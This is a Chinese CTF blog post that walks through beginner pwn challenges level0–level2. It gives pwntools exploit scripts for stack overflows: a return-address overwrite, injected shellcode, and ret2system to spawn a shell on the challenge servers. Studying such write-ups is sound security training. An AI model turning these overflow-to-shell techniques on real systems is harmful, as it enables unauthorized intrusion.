<!DOCTYPE html><html><head><meta name="generator" content="Hexo 3.8.0"><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="pwn level0，1，2"><meta name="keywords" content="pwn"><meta name="author" content="QianKeTutu"><meta name="copyright" content="QianKeTutu"><title>pwn level0，1，2 | QianKeTutu</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.6.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.6.1"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  }
} </script></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">QianKeTutu</div><div class="author-info__description text-center"></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">7</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">2</span></a></div></div></div><div id="content-outer"><div class="no-bg" id="top-container"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">QianKeTutu</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">pwn level0，1，2</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2019-07-25</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><a id="more"></a>
<p>#pwn level0 、 level1 、 level2总结</p>
<p>##pwn题初识</p>
<p>   初识pwn：“Pwn”是一个黑客语法的俚语词，是指攻破设备或者系统。发音类似“砰”，对黑客而言，这就是成功实施黑客攻击的声音——砰的一声，被“黑”的电脑或手机就被你操纵了。</p>
<p>  pwn题要干嘛：构造或者伪造后门函数，得到shell。</p>
<p>  看懂pwn题exp参考：pwntools使用简介<a href="https://blog.csdn.net/qq_29343201/article/details/51337025" title="pwntools使用简介" target="_blank" rel="noopener">https://blog.csdn.net/qq_29343201/article/details/51337025</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">##level0</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line">用IDA打开，找到main函数，F5反编汇后看到伪C 代码</span><br><span class="line">![伪C代码如下](https://i.imgur.com/DzBhVFo.png)</span><br><span class="line"></span><br><span class="line">双击查看vulnerable_function()函数内容，发现栈溢出. 查看函数列表，发现callsystem函数（即后门函数），双击查看。有“/bin/sh”，即终端，所以直接用此函数的地址覆盖，函数返回地址.</span><br><span class="line"></span><br><span class="line">exp如下：</span><br><span class="line"></span><br><span class="line">from pwn import *</span><br><span class="line">s_addr=0x400596</span><br><span class="line"></span><br><span class="line">p=remote(&quot;111.198.29.45&quot;,39645)</span><br><span class="line">p.sendline(&apos;a&apos;*0x80+&apos;a&apos;*8+p64(s_addr)</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br><span class="line">运行脚本获得shell，输入ls，cat flag命令，即可得flag.</span><br><span class="line"></span><br><span class="line">**原理：本来就有后门，无需构造，直接覆盖即可。**</span><br></pre></td></tr></table></figure>

<p>##level1</p>
<p>在虚拟机终端，用file 文件名命令，查看该文件是32位的，用checksec 文件名命令，查看文件保护机制.<br>用IDA打开，查看伪C代码，看代码，看vulnerable_function()函数代码，发现栈溢出，同时要知道程序是什么个程序.看函数列表发现并没有callsystem后门函数，所以需要我们自己构造.怎么构造呢？发现vulnerable_function()函数里输出了buf的地址，所以就可以用buf的地址覆盖函数返回地址，又因为NX防护没开，所以用shellcode写入buf，伪造后门函数。</p>
<p>exp1如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">       from pwn import *</span><br><span class="line"></span><br><span class="line">      shellcode=asm(shellcraft.sh())</span><br><span class="line">      io=remote(&quot;pwn2.jarvisoj.com&quot;,9877)   </span><br><span class="line"></span><br><span class="line">      text=io.recvline()[14: -2]</span><br><span class="line">      buf_addr=int(text,16)</span><br><span class="line">      payload=shellcode+&apos;a&apos;*(0x88+0x4-len(shellcode))+p32(buf_addr)</span><br><span class="line">      io.sendline(payload)</span><br><span class="line">      io.interactive()</span><br><span class="line">      io.close</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">exp2如下：</span><br></pre></td></tr></table></figure>

<pre><code>from pwn import *
context(arch=&apos;i386&apos;,os=&apos;linux&apos;)
p=remote(&quot;pwn2.jarvisoj.com&quot;,9877)
p.recvuntil(&quot;this:&quot;)
text=p.recv(10)
buf_addr=int(text,16)
p.recvline() #接收 \n,可有可无
payload=asm(shellcraft.sh()).ljust(0x88)+&apos;a&apos;*0x4+p32(buf_addr)
p.sendline(payload)
p.interactive()     </code></pre><p><strong>原理就是把shellcode（即是shellcraft.sh()，也是/bin/sh，也就是终端）写入buf，把函数返回地址覆盖成buf的地址.</strong></p>
<p>##level2</p>
<p>依然是用file 文件名，命令查该看文件是32位，checksec 文件名命令，查看该文件的防护信息.<br>用IDA打开该文件，没有callsystem函数，NX是enabled，所以也不能用shellcode，查看伪C代码vulnerable_function()里，发现栈溢出，用字符串搜索可以看到有个/bin/sh的字符串，函数列表里有个_system函数.这是个突破点，利用这个原理构造后门函数. 就是把_system的地址传入，由于调了_system这个函数，程序又相当于新建立了一个栈，所以得用一个东西覆盖它的函数返回地址. </p>
<p>exp如下：</p>
<pre><code>
      from pwn import *           
      system_addr=0x08048320    
      p=remote(&quot;pwn2.jarvisoj.com&quot;,9878)  
      sh_addr=0x0804A024
      payload=&apos;a&apos; * (0x88 + 0x4)+p32(system_addr)+p32(0)+p32(sh_addr)  
      p.sendline(payload)       
      p.interactive()

**原理就是：自己构造后门函数，根据_system函数的地址，字符串/bin/sh的地址，栈的结构，明白payload中每一段的意思.**</code></pre></div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">QianKeTutu</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://yoursite.com/2019/07/25/pwn012/">http://yoursite.com/2019/07/25/pwn012/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/pwn/">pwn</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2019/07/27/pwn3_x64_2_str/"><i class="fa fa-chevron-left">  </i><span>pwn level3 level2_x64及pwn1</span></a></div><div class="next-post pull-right"><a href="/2019/07/19/web张/"><span>第二天 ---web安全</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2018 - 2019 By QianKeTutu</div><div class="framework-info"><span>Driven - </span><a href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.6.1"></script><script src="/js/fancybox.js?version=1.6.1"></script><script src="/js/sidebar.js?version=1.6.1"></script><script src="/js/copy.js?version=1.6.1"></script><script src="/js/fireworks.js?version=1.6.1"></script><script src="/js/transition.js?version=1.6.1"></script><script src="/js/scroll.js?version=1.6.1"></script><script src="/js/head.js?version=1.6.1"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>